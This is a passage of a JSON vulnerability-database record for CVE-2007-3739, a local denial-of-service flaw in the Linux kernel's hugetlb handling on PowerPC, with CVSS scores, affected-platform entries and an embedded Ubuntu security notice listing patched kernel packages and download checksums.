                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:5.0:*:server:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:5.0:*:client:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:apple:powerpc:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2007-3739"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Debian",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "59655"
      },
      {
        "db": "PACKETSTORM",
        "id": "59688"
      }
    ],
    "trust": 0.2
  },
  "cve": "CVE-2007-3739",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 4.7,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.4,
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:M/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Local",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Partial",
            "baseScore": 1.9,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2007-3739",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Low",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:M/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 4.7,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.4,
            "id": "VHN-27101",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:L/AC:M/AU:N/C:N/I:N/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2007-3739",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "NVD",
            "id": "CVE-2007-3739",
            "trust": 0.8,
            "value": "Low"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-200709-179",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-27101",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-27101"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-000687"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200709-179"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-3739"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "mm/mmap.c in the hugetlb kernel, when run on PowerPC systems, does not prevent stack expansion from entering into reserved kernel page memory, which allows local users to cause a denial of service (OOPS) via unspecified vectors. (DoS) Vulnerabilities exist.Denial of service to malicious local users (DoS) There is a possibility of being put into a state. =========================================================== \nUbuntu Security Notice USN-518-1         September 25, 2007\nlinux-source-2.6.15/17/20 vulnerabilities\nCVE-2007-3731, CVE-2007-3739, CVE-2007-3740, CVE-2007-4573\n===========================================================\n\nA security issue affects the following Ubuntu releases:\n\nUbuntu 6.06 LTS\nUbuntu 6.10\nUbuntu 7.04\n\nThis advisory also applies to the corresponding versions of\nKubuntu, Edubuntu, and Xubuntu. \n\nThe problem can be corrected by upgrading your system to the\nfollowing package versions:\n\nUbuntu 6.06 LTS:\n  linux-image-2.6.15-29-386               2.6.15-29.60\n  linux-image-2.6.15-29-686               2.6.15-29.60\n  linux-image-2.6.15-29-amd64-generic     2.6.15-29.60\n  linux-image-2.6.15-29-amd64-k8          2.6.15-29.60\n  linux-image-2.6.15-29-amd64-server      2.6.15-29.60\n  linux-image-2.6.15-29-amd64-xeon        2.6.15-29.60\n  linux-image-2.6.15-29-hppa32            2.6.15-29.60\n  linux-image-2.6.15-29-hppa32-smp        2.6.15-29.60\n  linux-image-2.6.15-29-hppa64            2.6.15-29.60\n  linux-image-2.6.15-29-hppa64-smp        2.6.15-29.60\n  linux-image-2.6.15-29-itanium           2.6.15-29.60\n  linux-image-2.6.15-29-itanium-smp       2.6.15-29.60\n  linux-image-2.6.15-29-k7                2.6.15-29.60\n  linux-image-2.6.15-29-mckinley          2.6.15-29.60\n  linux-image-2.6.15-29-mckinley-smp      2.6.15-29.60\n  linux-image-2.6.15-29-powerpc           2.6.15-29.60\n  linux-image-2.6.15-29-powerpc-smp       2.6.15-29.60\n  linux-image-2.6.15-29-powerpc64-smp     2.6.15-29.60\n  linux-image-2.6.15-29-server            2.6.15-29.60\n  linux-image-2.6.15-29-server-bigiron    2.6.15-29.60\n  linux-image-2.6.15-29-sparc64           2.6.15-29.60\n  linux-image-2.6.15-29-sparc64-smp       2.6.15-29.60\n\nUbuntu 6.10:\n  linux-image-2.6.17-12-386               2.6.17.1-12.41\n  linux-image-2.6.17-12-generic           2.6.17.1-12.41\n  linux-image-2.6.17-12-hppa32            2.6.17.1-12.41\n  linux-image-2.6.17-12-hppa64            2.6.17.1-12.41\n  linux-image-2.6.17-12-itanium           2.6.17.1-12.41\n  linux-image-2.6.17-12-mckinley          2.6.17.1-12.41\n  linux-image-2.6.17-12-powerpc           2.6.17.1-12.41\n  linux-image-2.6.17-12-powerpc-smp       2.6.17.1-12.41\n  linux-image-2.6.17-12-powerpc64-smp     2.6.17.1-12.41\n  linux-image-2.6.17-12-server            2.6.17.1-12.41\n  linux-image-2.6.17-12-server-bigiron    2.6.17.1-12.41\n  linux-image-2.6.17-12-sparc64           2.6.17.1-12.41\n  linux-image-2.6.17-12-sparc64-smp       2.6.17.1-12.41\n\nUbuntu 7.04:\n  linux-image-2.6.20-16-386               2.6.20-16.32\n  linux-image-2.6.20-16-generic           2.6.20-16.32\n  linux-image-2.6.20-16-hppa32            2.6.20-16.32\n  linux-image-2.6.20-16-hppa64            2.6.20-16.32\n  linux-image-2.6.20-16-itanium           2.6.20-16.32\n  linux-image-2.6.20-16-lowlatency        2.6.20-16.32\n  linux-image-2.6.20-16-mckinley          2.6.20-16.32\n  linux-image-2.6.20-16-powerpc           2.6.20-16.32\n  linux-image-2.6.20-16-powerpc-smp       2.6.20-16.32\n  linux-image-2.6.20-16-powerpc64-smp     2.6.20-16.32\n  linux-image-2.6.20-16-server            2.6.20-16.32\n  linux-image-2.6.20-16-server-bigiron    2.6.20-16.32\n  linux-image-2.6.20-16-sparc64           2.6.20-16.32\n  linux-image-2.6.20-16-sparc64-smp       2.6.20-16.32\n\nAfter a standard system upgrade you need to reboot your computer to\naffect the necessary changes. \n\nDetails follow:\n\nEvan Teran discovered that the Linux kernel ptrace routines did not\ncorrectly handle certain requests robustly. \n(CVE-2007-4573)\n\n\nUpdated packages for Ubuntu 6.06 LTS:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-29.60.diff.gz\n      Size/MD5:  2861572 992314f317fb2564845d961f10eb669c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-29.60.dsc\n      Size/MD5:     2374 ea98a1231d5e3b39ee323094330779ab\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15.orig.tar.gz\n      Size/MD5: 57403387 88ab0747cb8c2ceed662e0fd1b27d81d\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-doc-2.6.15_2.6.15-29.60_all.deb\n      Size/MD5:  5164002 1d798798df2b0e7be8312a541a84351c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-kernel-devel_2.6.15-29.60_all.deb\n      Size/MD5:    91812 8b49eb63250c21295b63d97e48caaf2d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-29.60_all.deb\n      Size/MD5: 44728890 8c42dde4ed9a757ab7b6a92835fd95ea\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb\n      Size/MD5:    22350 4c3cb3df749dbfe529727df7a7d3a1a6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb\n      Size/MD5:    44768 918f818f4f2c18342cdb370f69c75b6f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb\n      Size/MD5:     2308 364b72a63d4437fb444606fa10a36e5b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb\n      Size/MD5:    36248 c9a3bcd22da9b74f7d82772a2131582a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb\n      Size/MD5:   102288 3fac5df61abc13bee3d1f02b288ef717\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb\n      Size/MD5:    38880 4e1a5a061eee39d7f868ca3fc7405fdd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb\n      Size/MD5:    49132 747ee42e436d90f369c78ade768b0fb3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb\n      Size/MD5:   176700 16c192c3c5dc7e76d66c54198809fdc4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb\n      Size/MD5:    36770 802fa7986361535ac23f3cd5706548f2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb\n      Size/MD5:   142250 d0a8a7527b160352ccec7e0d45e295a3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb\n      Size/MD5:    51040 324c0b5e5173e97d714c4d525dcbc561\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb\n      Size/MD5:   140600 e1a6c9cf002775ccc1435ebab3bc410e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb\n      Size/MD5:   286888 a20b6008a0282e0f29a766b1f096923b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb\n      Size/MD5:    97796 e5c9a1543b6fdfa84dc59f4e7546fa2f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb\n      Size/MD5:  1650780 08c9d7b3a8e578dd9683b965b41387c5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29-amd64-generic_2.6.15-29.60_amd64.deb\n      Size/MD5:   869484 a2bae2aa842f48fe46ea23a75e32f798\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29-amd64-k8_2.6.15-29.60_amd64.deb\n      Size/MD5:   868860 1eddb75fceb142d9d189bb07a8fa3508\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29-amd64-server_2.6.15-29.60_amd64.deb\n      Size/MD5:   869542 90ac3aa178a08a7e25a3c986437f61c2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29-amd64-xeon_2.6.15-29.60_amd64.deb\n      Size/MD5:   865334 86b00982764739314edfa7eda97e3ea9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29_2.6.15-29.60_amd64.deb\n      Size/MD5:  6915922 ace2f4f390f45a8baf8948ce92b1185f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-29-amd64-generic_2.6.15-29.60_amd64.deb\n      Size/MD5: 20804078 9c8596f2bf11553c3b89541f2e6b3e36\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-29-amd64-k8_2.6.15-29.60_amd64.deb\n      Size/MD5: 20778400 b80de9fda371f41b8f3f898f677c81cc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-29-amd64-server_2.6.15-29.60_amd64.deb\n      Size/MD5: 21624500 d8f93fd23fc44555b4e9b3f6bf2661d4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-29-amd64-xeon_2.6.15-29.60_amd64.deb\n      Size/MD5: 19890352 fdff7a7f1be434702a034b517da1436c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb\n      Size/MD5:    15628 29ac5d64ab3f967bb59ba715b5217b9e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb\n      Size/MD5:   240272 650e63fca69efad6ca39ea689ec46683\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb\n      Size/MD5:   202548 5bc5a643e51c26fff8a407d2ce90d4e5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb\n      Size/MD5:  1048608 1b72fc6272a7c22f40c4009a5a2b5c1f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb\n      Size/MD5:  1486560 3d0039e5b8ad2a73e494b9d5ce71780f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb\n      Size/MD5:   161642 a724a1c820f4524a9a75e99db316d08d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb\n      Size/MD5:     9828 9f09f7b5b89fa050b4e08923b4515ac7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb\n      Size/MD5:    80852 e41dc1bc6ea76debb02a76ed29ed1260\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb\n      Size/MD5:    49164 06c6574e233bb526d98d25c2a1404994\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb\n      Size/MD5:    35160 39674f9a3de32fe1a779a5f4b2f977ce\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb\n      Size/MD5:    70860 588508535ff2a1b31f2fe05bea3db6c8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb\n      Size/MD5:     6216 5ffc9686a097131b5980cdb2549d1f12\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb\n      Size/MD5:     9058 8e2fafc78b8c330ae43f3de8567a5ff5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb\n      Size/MD5:    57878 44329e40c195ee0f42994dc760bb5fcc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb\n      Size/MD5:   123328 91f9a4fda1e0d76ae32c9beaf101131d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb\n      Size/MD5:   100880 bc3d8f4bf7a77a6462385966b437882d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb\n      Size/MD5:    79234 2bc08545229d05e5b9bedd639778bb5c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb\n      Size/MD5:  1594714 92331ca83235f62cdac8161c11b26b08\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb\n      Size/MD5:    72288 ef1c4009f30bc3c15e95fe0146784448\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb\n      Size/MD5:    12650 d35a35d8e20e7e098348b42396f3de99\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb\n      Size/MD5:    33734 af7a8f60c54ebd068b7d0cc18d789560\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb\n      Size/MD5:   138182 f80598f18000bb150dfb91e8097faa0c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb\n      Size/MD5:    38932 914391dd36d1d70d4614109f56c44a8c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb\n      Size/MD5:   278738 97e0dbb44ee9cc421d52d69abd938fcc\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb\n      Size/MD5:    18968 95109c7a00d02bde41e710a650daaf9e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb\n      Size/MD5:    43450 ff94d128c899ce965bb2ea6e322ecf08\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb\n      Size/MD5:   105200 a8287e00a0c05a5538cc0391906d67e2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb\n      Size/MD5:     2280 70c978111851b479b4bd56464a2fba38\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb\n      Size/MD5:    34574 fa902e8d71e612c1d5c781b838bab9ad\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb\n      Size/MD5:    96958 95d49cdc14c8660432c91a3bc09bf57c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb\n      Size/MD5:    37080 9bc7b95ad65241141d56b4d159faa63e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb\n      Size/MD5:    44072 5ca25f1bdf2da3e4c7f5a156372b6713\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb\n      Size/MD5:   167746 b1b6a9274da69f85e90e11d6c476487b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb\n      Size/MD5:    33928 b87d0fd21930fc1ba059662465374fc8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb\n      Size/MD5:   137838 2c5b08b39b63e2a6406b8e1db065f8a1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb\n      Size/MD5:    46874 43ebdaadfd384f8b15f83fd671715013\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb\n      Size/MD5:   132964 ac79d6762da890f46a137247e9a4997d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb\n      Size/MD5:   273460 963d1bd9e3b2cd65c5f3c67cd2c99b2f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb\n      Size/MD5:   102250 fdcf2a1f6ef8c580b8ee0f39d92ae61a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-29-386-di_2.6.15-29.60_i386.udeb\n      Size/MD5:  1595586 7c78c5e600f497a1296e6f4d687db80a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29-386_2.6.15-29.60_i386.deb\n      Size/MD5:   855294 c8226f61389965def3dd751b325c9d50\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29-686_2.6.15-29.60_i386.deb\n      Size/MD5:   856320 fa0a447cadfade07a6dd38ac9b77fc9d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29-k7_2.6.15-29.60_i386.deb\n      Size/MD5:   858182 3eeaf1b4aa7a0ef04e42644440fb5a34\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29-server-bigiron_2.6.15-29.60_i386.deb\n      Size/MD5:   861924 9958b24ec91fc7b2d80b1f388be251c2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29-server_2.6.15-29.60_i386.deb\n      Size/MD5:   856724 5cac6b200e21c35b68873335a55e1969\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29_2.6.15-29.60_i386.deb\n      Size/MD5:  6908102 291aa054ab7051af6f75cbcecd1b64fd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-29-386_2.6.15-29.60_i386.deb\n      Size/MD5: 21706576 6f159fb44cda586afee845a2c495faf8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-29-686_2.6.15-29.60_i386.deb\n      Size/MD5: 22502914 9346112c1b848b7b252cf857e98aba8e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-29-k7_2.6.15-29.60_i386.deb\n      Size/MD5: 22244476 d7ee303955b1be0d900127c8ee0d6de5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-29-server-bigiron_2.6.15-29.60_i386.deb\n      Size/MD5: 23605582 de50ae9143cc6a7d8ce26b22eaa1bcd8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-29-server_2.6.15-29.60_i386.deb\n      Size/MD5: 23167510 71224f4c66f5355abfa3c0f1a0b54f23\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb\n      Size/MD5:    15498 890b3d262306cea9380241dde14fd78f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb\n      Size/MD5:   238438 c71260c4fd965d33f190f2531d487a72\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb\n      Size/MD5:   196968 252485c4aca1c2a775e41fdc7dc84c62\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-29-386-di_2.6.15-29.60_i386.udeb\n      Size/MD5:  1048380 21d1f3891bff98f3113ad95e5eecf8eb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb\n      Size/MD5:  1684992 a257e4ca24202bb249aad71c072a3d47\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb\n      Size/MD5:   160816 6395c6d97d5d5eee151734c297eed382\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb\n      Size/MD5:     9162 0d4937205b319d90d127f8c178ab3494\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb\n      Size/MD5:    76476 4ddd26af38b390ef5facdd96caf7f77b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb\n      Size/MD5:    53252 ac1c736ee2220b2eb556c14040dbc338\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb\n      Size/MD5:    33058 ba263a1da07ca910a0b615a0afb1b5f6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb\n      Size/MD5:    85630 3a74d92d184a81b2e7dcff96a3458676\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb\n      Size/MD5:     6026 d83e2390601f1edfa5a03423fb4b3dd5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb\n      